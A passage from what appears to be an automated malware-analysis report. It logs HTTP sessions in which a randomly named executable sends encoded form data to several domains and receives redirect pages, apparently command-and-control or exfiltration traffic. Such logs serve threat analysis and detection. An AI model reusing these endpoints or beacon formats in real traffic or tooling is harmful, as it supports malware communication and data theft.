                                                                                                Data Raw: 49 42 51 50 3d 43 59 5a 72 38 38 4f 75 4d 51 42 6e 57 47 4f 51 7a 71 62 32 36 6c 4e 70 42 58 33 30 67 6d 30 31 73 65 76 73 2b 55 2b 78 35 67 64 7a 78 4d 48 53 75 6d 59 53 30 72 34 79 67 6d 31 62 62 67 53 66 5a 43 4b 71 48 6e 4e 63 71 52 33 32 77 31 4b 58 6b 6e 50 2b 61 2f 30 7a 76 75 76 53 4a 75 70 30 51 53 38 32 62 34 66 7a 49 62 70 56 48 32 30 65 76 57 59 53 33 37 75 54 79 55 44 55 54 48 46 57 30 55 61 79 65 34 76 42 7a 53 67 2f 57 4d 64 45 5a 51 36 73 33 38 31 47 4d 63 71 49 55 4a 4c 58 68 74 61 36 63 6f 55 51 69 63 77 39 7a 6d 44 59 64 61 41 66 33 61 51 4b 36 36 64 47 69 32 35 5a 4f 5a 6f 70 38 74 50 33 75 36 2f 4f 54 50 43 4d 63 72 6b 64 77 73 4d 3d
                                                                                                Data Ascii: IBQP=CYZr88OuMQBnWGOQzqb26lNpBX30gm01sevs+U+x5gdzxMHSumYS0r4ygm1bbgSfZCKqHnNcqR32w1KXknP+a/0zvuvSJup0QS82b4fzIbpVH20evWYS37uTyUDUTHFW0Uaye4vBzSg/WMdEZQ6s381GMcqIUJLXhta6coUQicw9zmDYdaAf3aQK66dGi25ZOZop8tP3u6/OTPCMcrkdwsM=


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                31192.168.11.20497773.33.130.190807940C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:02:58.754354954 CET1289OUTPOST /5lh9/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.bocadolobopetra.net
                                                                                                Origin: http://www.bocadolobopetra.net
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 7369
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.bocadolobopetra.net/5lh9/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Raw: 49 42 51 50 3d 43 59 5a 72 38 38 4f 75 4d 51 42 6e 57 47 4f 51 7a 71 62 32 36 6c 4e 70 42 58 33 30 67 6d 30 31 73 65 76 73 2b 55 2b 78 35 67 56 7a 77 2b 50 53 74 42 45 53 6d 37 34 79 2f 57 31 59 62 67 53 65 5a 43 43 6d 48 6e 42 6d 71 54 50 32 78 54 32 58 31 47 50 2b 51 2f 30 7a 6d 4f 76 54 48 4f 70 74 51 53 73 4d 62 34 76 7a 49 62 70 56 48 30 73 65 34 58 59 53 6b 72 75 51 69 45 44 49 43 58 46 2b 30 53 79 45 65 34 72 2f 7a 6a 41 2f 57 73 4e 45 61 6c 4f 73 2f 38 31 41 50 63 72 4e 55 4a 47 56 68 74 47 32 63 70 67 36 69 62 73 39 79 77 65 7a 4a 36 30 66 68 4b 45 47 78 34 56 37 74 77 31 39 4d 6f 51 78 77 63 54 6f 67 39 7a 46 64 4e 57 42 42 71 30 5a 72 37 47 48 57 79 2f 31 30 47 46 6f 38 67 4a 34 5a 47 66 74 7a 63 6b 55 5a 6a 71 53 68 42 34 4b 47 4e 4b 57 58 50 37 54 2f 4d 6a 45 6b 37 38 44 31 63 50 51 4f 74 6a 74 59 4a 4b 66 70 59 6c 6a 6a 37 6e 67 6a 42 50 65 57 30 58 5a 57 54 4a 35 50 76 41 59 6d 36 30 61 5a 31 63 48 43 6c 32 62 55 65 79 47 76 70 68 32 48 53 35 4d 30 4d 71 7a 41 66 45 77 51 65 4a 4b 6a [TRUNCATED]
                                                                                                Data Ascii: IBQP=CYZr88OuMQBnWGOQzqb26lNpBX30gm01sevs+U+x5gVzw+PStBESm74y/W1YbgSeZCCmHnBmqTP2xT2X1GP+Q/0zmOvTHOptQSsMb4vzIbpVH0se4XYSkruQiEDICXF+0SyEe4r/zjA/WsNEalOs/81APcrNUJGVhtG2cpg6ibs9ywezJ60fhKEGx4V7tw19MoQxwcTog9zFdNWBBq0Zr7GHWy/10GFo8gJ4ZGftzckUZjqShB4KGNKWXP7T/MjEk78D1cPQOtjtYJKfpYljj7ngjBPeW0XZWTJ5PvAYm60aZ1cHCl2bUeyGvph2HS5M0MqzAfEwQeJKjTpJvDwNYKOrCxibTpwfDpr7WtYKaRmdC7g60x4EtNhcDZsR5D3ZA1dHDJbk1+2Wu18xhqQjSaSdmoqPhF0J0z1EdppL3o/eJw6FIrXCecpJnfVc2bclygNd/x2f7OAcQDj6cXSQv62kLYL0Y88sucjzmhATf91hnuFOg+aw/M0Skr1xVo/rhZb7U1cTahV8927hXs5QJeBGFFTqgyi4jErCYXf6kqB3p0HbHTO5xWkYTdRMftywveTNBADP3PNLlfPaiu5k9xZyLconCuC8XgtcqjEM3xe9byb5q9HTSNv8GVYYuVPf6BzWNFDS6/1marNCEfCAbZXHnpMlUZsOWseohhhEj5k0nCh4xEQ3/GiAjb4AdZ15lRQ
                                                                                                Nov 11, 2024 17:02:58.754415989 CET6657OUTData Raw: 77 70 30 67 61 48 36 77 7a 41 31 5a 63 44 42 50 52 67 6e 68 47 78 38 66 50 2f 44 46 35 67 51 7a 4c 6e 55 76 39 6b 51 70 64 55 44 54 57 46 63 78 2f 46 55 52 4e 4b 4f 74 62 66 66 6c 54 54 6b 50 74 4b 58 6c 4e 66 65 57 4f 34 2b 30 6c 53 79 2b 4b 2f
                                                                                                Data Ascii: wp0gaH6wzA1ZcDBPRgnhGx8fP/DF5gQzLnUv9kQpdUDTWFcx/FURNKOtbfflTTkPtKXlNfeWO4+0lSy+K/YIt4R8IqRts+omMG8LfGVICijT9Sjw9nzGveshZN8ukm2+kNVjAQ8BMo26Ysacpa0YNmQ0VmYWgj+oMWrCadlKtuLOzZZHSs1m9U4DqUVtChPom0Rj4ahasovGuAlx5ctE4TOEDrpXDUa8JT0wxOiBR+M1erFd+Mo


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                32192.168.11.20497783.33.130.190807940C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:03:01.407815933 CET503OUTGET /5lh9/?Lr3=uHMLTHRPCpsdapr&IBQP=PaxL/KCEHD9JblfI8738jkEyOBGmpH0n0YqV+FGo7SRz69ewzjAIy/AjxHMCTjWvQh2WDn5x5gTk9H7000rUU48po7SBA+lXfQsIcMqVCaJxO3wRg1gJgNU= HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Language: en-us
                                                                                                Host: www.bocadolobopetra.net
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Nov 11, 2024 17:03:01.548108101 CET400INHTTP/1.1 200 OK
                                                                                                Server: openresty
                                                                                                Date: Mon, 11 Nov 2024 16:03:01 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 260
                                                                                                Connection: close
                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 4c 72 33 3d 75 48 4d 4c 54 48 52 50 43 70 73 64 61 70 72 26 49 42 51 50 3d 50 61 78 4c 2f 4b 43 45 48 44 39 4a 62 6c 66 49 38 37 33 38 6a 6b 45 79 4f 42 47 6d 70 48 30 6e 30 59 71 56 2b 46 47 6f 37 53 52 7a 36 39 65 77 7a 6a 41 49 79 2f 41 6a 78 48 4d 43 54 6a 57 76 51 68 32 57 44 6e 35 78 35 67 54 6b 39 48 37 30 30 30 72 55 55 34 38 70 6f 37 53 42 41 2b 6c 58 66 51 73 49 63 4d 71 56 43 61 4a 78 4f 33 77 52 67 31 67 4a 67 4e 55 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Lr3=uHMLTHRPCpsdapr&IBQP=PaxL/KCEHD9JblfI8738jkEyOBGmpH0n0YqV+FGo7SRz69ewzjAIy/AjxHMCTjWvQh2WDn5x5gTk9H7000rUU48po7SBA+lXfQsIcMqVCaJxO3wRg1gJgNU="}</script></head></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                33192.168.11.20497793.33.130.190807940C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:03:06.922224045 CET753OUTPOST /ywsl/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.rmzl-0.rest
                                                                                                Origin: http://www.rmzl-0.rest
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 201
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.rmzl-0.rest/ywsl/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Raw: 49 42 51 50 3d 30 31 57 50 65 41 45 58 51 5a 79 67 59 31 79 65 46 6a 5a 47 2f 32 55 6d 43 43 7a 36 58 6a 48 73 4a 78 41 69 68 48 32 6e 67 4e 4d 5a 4e 50 4c 6f 64 52 32 6f 45 4d 78 55 7a 74 4a 7a 67 75 48 7a 66 6c 47 4d 61 36 4d 69 55 4f 55 34 56 68 4a 78 56 51 65 59 48 53 51 31 66 68 50 77 6d 56 5a 2b 6f 43 62 38 43 38 6a 52 6c 6a 2b 32 47 46 67 63 4b 62 34 48 63 5a 34 76 2f 52 78 79 6f 38 56 45 74 2b 44 72 73 63 30 6a 6d 62 6b 53 6c 31 6d 4c 6d 4d 43 6e 56 55 4d 79 72 34 4a 72 48 65 75 54 43 33 35 74 6e 75 6d 75 68 32 37 4e 4c 45 51 61 4c 48 4e 5a 47 32 56 58 73 4e 47 45 48 47 6c 41 61 51 3d 3d
                                                                                                Data Ascii: IBQP=01WPeAEXQZygY1yeFjZG/2UmCCz6XjHsJxAihH2ngNMZNPLodR2oEMxUztJzguHzflGMa6MiUOU4VhJxVQeYHSQ1fhPwmVZ+oCb8C8jRlj+2GFgcKb4HcZ4v/Rxyo8VEt+Drsc0jmbkSl1mLmMCnVUMyr4JrHeuTC35tnumuh27NLEQaLHNZG2VXsNGEHGlAaQ==


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                34192.168.11.20497803.33.130.190807940C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:03:09.579833031 CET773OUTPOST /ywsl/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.rmzl-0.rest
                                                                                                Origin: http://www.rmzl-0.rest
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 221
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.rmzl-0.rest/ywsl/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Raw: 49 42 51 50 3d 30 31 57 50 65 41 45 58 51 5a 79 67 59 57 71 65 4a 69 5a 47 33 32 55 6e 48 43 7a 36 4f 54 48 67 4a 78 63 69 68 47 69 33 68 2f 6f 5a 4e 72 50 6f 63 51 32 6f 46 4d 78 55 37 4e 4a 71 74 4f 47 65 66 6c 44 78 61 37 77 69 55 4f 41 34 56 67 35 78 55 6e 79 66 42 43 51 67 58 42 50 32 6f 31 5a 2b 6f 43 62 38 43 2f 65 38 6c 67 4f 32 48 31 51 63 4c 36 34 41 44 70 34 73 34 52 78 79 73 38 55 44 74 2b 44 46 73 5a 74 45 6d 5a 73 53 6c 33 2b 4c 6d 5a 2b 6b 4d 6b 4d 34 76 34 49 4c 43 39 54 59 44 57 56 79 33 38 69 52 67 48 32 31 4b 53 64 41 57 31 35 39 46 6c 4a 6c 6f 39 2f 73 46 45 6b 62 48 52 52 67 48 62 76 69 79 6b 6a 52 61 48 34 4a 31 6f 45 51 37 41 6f 3d
                                                                                                Data Ascii: IBQP=01WPeAEXQZygYWqeJiZG32UnHCz6OTHgJxcihGi3h/oZNrPocQ2oFMxU7NJqtOGeflDxa7wiUOA4Vg5xUnyfBCQgXBP2o1Z+oCb8C/e8lgO2H1QcL64ADp4s4Rxys8UDt+DFsZtEmZsSl3+LmZ+kMkM4v4ILC9TYDWVy38iRgH21KSdAW159FlJlo9/sFEkbHRRgHbviykjRaH4J1oEQ7Ao=


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                35192.168.11.20497813.33.130.190807940C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:03:12.235996962 CET2578OUTPOST /ywsl/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.rmzl-0.rest
                                                                                                Origin: http://www.rmzl-0.rest
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 7369
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.rmzl-0.rest/ywsl/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Raw: 49 42 51 50 3d 30 31 57 50 65 41 45 58 51 5a 79 67 59 57 71 65 4a 69 5a 47 33 32 55 6e 48 43 7a 36 4f 54 48 67 4a 78 63 69 68 47 69 33 68 2f 67 5a 4e 59 58 6f 61 7a 75 6f 47 4d 78 55 78 74 4a 33 74 4f 48 63 66 6c 36 36 61 37 38 59 55 4b 77 34 61 69 42 78 42 6c 4b 66 50 43 51 67 56 42 50 33 6d 56 5a 72 6f 43 4b 31 43 2f 4f 38 6c 67 4f 32 48 33 34 63 4d 72 34 41 59 70 34 76 2f 52 78 2b 6f 38 56 6b 74 2b 4b 34 73 5a 68 2b 6d 70 4d 53 6c 58 75 4c 6a 76 71 6b 45 6b 4d 32 69 59 49 70 43 39 66 58 44 57 4a 45 33 38 6e 30 67 47 75 31 4a 46 67 55 43 42 31 79 48 54 31 76 6c 66 76 56 47 6b 46 49 59 68 4e 66 4b 74 6e 78 73 30 48 71 57 52 30 48 78 35 45 73 36 56 4a 35 74 39 68 59 59 4f 33 74 59 63 63 62 48 50 72 63 30 32 37 63 71 75 6a 6d 67 61 47 6e 74 35 61 4d 66 6a 30 37 4d 4c 45 6e 53 78 4a 5a 49 36 43 70 64 4b 45 70 44 33 57 59 32 48 4d 43 37 35 47 31 65 48 50 5a 5a 46 41 31 68 79 38 6a 2f 31 59 69 37 36 46 48 76 57 72 76 30 58 37 4a 46 2b 6a 31 7a 69 6c 68 46 6a 4a 4f 6a 74 4b 2f 62 33 33 62 67 6f 50 7a 42 [TRUNCATED]
                                                                                                Data Ascii: IBQP=01WPeAEXQZygYWqeJiZG32UnHCz6OTHgJxcihGi3h/gZNYXoazuoGMxUxtJ3tOHcfl66a78YUKw4aiBxBlKfPCQgVBP3mVZroCK1C/O8lgO2H34cMr4AYp4v/Rx+o8Vkt+K4sZh+mpMSlXuLjvqkEkM2iYIpC9fXDWJE38n0gGu1JFgUCB1yHT1vlfvVGkFIYhNfKtnxs0HqWR0Hx5Es6VJ5t9hYYO3tYccbHPrc027cqujmgaGnt5aMfj07MLEnSxJZI6CpdKEpD3WY2HMC75G1eHPZZFA1hy8j/1Yi76FHvWrv0X7JF+j1zilhFjJOjtK/b33bgoPzBneyt4IvqGmJgWVh3MRVa834N9PpNoLpAw7epCJJqaCTV37mnt/oK08877RwqEDmvr6Emey3qCgxmcZIUegjlrPIkmxsfy/mZi9EgIJCn+Zdv/+JqRp1FGeWWQ1abk0/MjZW60D5ebiI0c+twvfNmPT5xPkpiioHoZIL+TJvQWrcH+cSxZraqAc1unlfh/OQ/XkgUa+HLiY8vJq1YqjxEuLN6Rf5N8l8nC9XbCy4FC/ahPtwXsbqRwSOi82RMjU6E6T8kf96JMRenArjNW9CshLBUnjz7t2WOHNocX1hMTnGz0w6adS26wimOflPnrhMp4lnrlFog9iFzg41H/W4lnGieCyeI698Ez9mZDWBbnvZ6HkihTyGX6ecof0EiTcnxpc6uS8Z/CeBuumhYVBPjmWKUgAr26QgmXgHbJQ8KNYXLYJL94abgnwml0pVJOo5QSdukCGNho1IBUo/w0S4egdihBZNLg5EQI3y1GbB+1qmKYmSzftPP/BNLLNeXnycwPnqXkbjTBP4p2+SX1izj7aEYpoR3fSSxU8mcjCvFqLQFSkek18Qv41VK2iS42er7fyvAgVbPcIBaU6EMF57poXdr5ZkDX5NIAk0Uc0e48IHO1vIrTmYCGRgEifzerXBfHDqRPEZTWPKdLjd4go9nn3gxheFKHieI/C [TRUNCATED]
                                                                                                Nov 11, 2024 17:03:12.236040115 CET5344OUTData Raw: 46 61 39 66 75 57 6b 35 63 78 31 69 46 34 33 30 70 66 55 74 54 69 52 47 2f 59 77 55 61 74 56 47 47 6b 52 48 78 35 67 76 56 43 39 36 35 66 55 5a 6b 57 6b 73 4f 72 37 62 38 62 5a 68 6b 64 77 6f 39 61 62 5a 70 51 61 73 35 74 4c 59 67 76 44 41 77 6c
                                                                                                Data Ascii: Fa9fuWk5cx1iF430pfUtTiRG/YwUatVGGkRHx5gvVC965fUZkWksOr7b8bZhkdwo9abZpQas5tLYgvDAwluutciuQ94NwmqYt6X/RoIbF0DmPSXdzYkffDaHTeJWDyxra7Q3mcanbXkUf4p/Kxx/jCnkrwfsGJNBCpQzGOQR4heALYybFO77LLmiQKqBXmDxAkSqHjhIrkOGSs6a02PJBBLWJQ9DyOmkveOFn9hvy5cZJHfhZdP


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                36192.168.11.20497823.33.130.190807940C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:03:14.907131910 CET495OUTGET /ywsl/?IBQP=53+vd04YW42mc36XCB5F63IhABrVfiuEAy5fmEaureJqNK/sdjqjQsdG685okMjqTRenKpUPfuASSj1yCn6YHCZWeE+kvE1krRyqLOvcoxG1FUsRKY0MVeU=&Lr3=uHMLTHRPCpsdapr HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Language: en-us
                                                                                                Host: www.rmzl-0.rest
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Nov 11, 2024 17:03:15.045154095 CET400INHTTP/1.1 200 OK
                                                                                                Server: openresty
                                                                                                Date: Mon, 11 Nov 2024 16:03:14 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 260
                                                                                                Connection: close
                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 49 42 51 50 3d 35 33 2b 76 64 30 34 59 57 34 32 6d 63 33 36 58 43 42 35 46 36 33 49 68 41 42 72 56 66 69 75 45 41 79 35 66 6d 45 61 75 72 65 4a 71 4e 4b 2f 73 64 6a 71 6a 51 73 64 47 36 38 35 6f 6b 4d 6a 71 54 52 65 6e 4b 70 55 50 66 75 41 53 53 6a 31 79 43 6e 36 59 48 43 5a 57 65 45 2b 6b 76 45 31 6b 72 52 79 71 4c 4f 76 63 6f 78 47 31 46 55 73 52 4b 59 30 4d 56 65 55 3d 26 4c 72 33 3d 75 48 4d 4c 54 48 52 50 43 70 73 64 61 70 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?IBQP=53+vd04YW42mc36XCB5F63IhABrVfiuEAy5fmEaureJqNK/sdjqjQsdG685okMjqTRenKpUPfuASSj1yCn6YHCZWeE+kvE1krRyqLOvcoxG1FUsRKY0MVeU=&Lr3=uHMLTHRPCpsdapr"}</script></head></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                37192.168.11.20497833.33.130.190807940C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:03:20.389045954 CET750OUTPOST /jwt5/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.imgiu9.vip
                                                                                                Origin: http://www.imgiu9.vip
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 201
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.imgiu9.vip/jwt5/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Raw: 49 42 51 50 3d 4d 59 70 49 7a 6c 2f 43 36 77 46 79 64 4c 6b 72 72 76 78 38 31 76 43 4d 30 48 4f 42 48 33 30 68 41 46 34 45 77 50 6b 31 50 77 31 58 55 2b 44 6c 5a 4b 44 77 6b 69 63 72 58 61 61 59 4c 58 56 42 78 47 7a 65 63 6a 33 75 4e 37 72 74 79 72 76 53 56 4d 6b 59 6a 6c 66 49 72 32 66 48 78 49 61 68 43 7a 39 62 62 54 51 66 48 34 7a 65 65 48 56 72 46 64 4f 59 39 61 6d 39 6b 2f 57 63 6f 54 6f 2b 64 77 69 4b 32 61 30 73 62 73 53 51 4d 62 35 75 59 6b 36 56 69 75 46 34 2b 2b 67 56 4a 57 35 33 4e 37 63 76 74 39 75 67 34 7a 44 64 6e 66 48 66 57 61 75 6d 49 41 4b 4b 50 78 39 4a 63 2b 43 78 47 41 3d 3d
                                                                                                Data Ascii: IBQP=MYpIzl/C6wFydLkrrvx81vCM0HOBH30hAF4EwPk1Pw1XU+DlZKDwkicrXaaYLXVBxGzecj3uN7rtyrvSVMkYjlfIr2fHxIahCz9bbTQfH4zeeHVrFdOY9am9k/WcoTo+dwiK2a0sbsSQMb5uYk6ViuF4++gVJW53N7cvt9ug4zDdnfHfWaumIAKKPx9Jc+CxGA==


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                38192.168.11.20497843.33.130.190807940C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:03:23.045794964 CET770OUTPOST /jwt5/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.imgiu9.vip
                                                                                                Origin: http://www.imgiu9.vip
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 221
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.imgiu9.vip/jwt5/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Raw: 49 42 51 50 3d 4d 59 70 49 7a 6c 2f 43 36 77 46 79 50 61 55 72 70 4d 4a 38 69 2f 43 4c 71 33 4f 42 53 6e 30 62 41 46 6b 45 77 4c 63 6c 54 54 52 58 55 63 62 6c 59 4c 44 77 6e 69 63 72 44 4b 61 6e 57 48 55 44 78 47 2f 57 63 6a 37 75 4e 37 2f 74 79 71 66 53 56 39 6b 62 6c 31 66 47 79 47 66 46 2f 6f 61 68 43 7a 39 62 62 54 46 58 48 38 58 65 65 53 46 72 4b 5a 53 58 30 36 6d 38 6a 2f 57 63 73 54 6f 36 64 77 69 30 32 62 6f 4b 62 70 57 51 4d 5a 68 75 59 77 75 57 33 65 46 2b 30 65 68 35 4e 56 63 48 45 62 39 59 6b 4f 2b 6f 35 57 47 6c 72 70 4b 46 4c 6f 61 43 4c 54 57 34 4c 42 45 68 65 38 44 71 62 44 6e 6a 55 52 63 6b 59 63 6d 45 73 44 58 37 46 72 75 54 6d 6f 55 3d
                                                                                                Data Ascii: IBQP=MYpIzl/C6wFyPaUrpMJ8i/CLq3OBSn0bAFkEwLclTTRXUcblYLDwnicrDKanWHUDxG/Wcj7uN7/tyqfSV9kbl1fGyGfF/oahCz9bbTFXH8XeeSFrKZSX06m8j/WcsTo6dwi02boKbpWQMZhuYwuW3eF+0eh5NVcHEb9YkO+o5WGlrpKFLoaCLTW4LBEhe8DqbDnjURckYcmEsDX7FruTmoU=


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                39192.168.11.20497863.33.130.190807940C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:03:25.701711893 CET2578OUTPOST /jwt5/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.imgiu9.vip
                                                                                                Origin: http://www.imgiu9.vip
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 7369
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.imgiu9.vip/jwt5/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
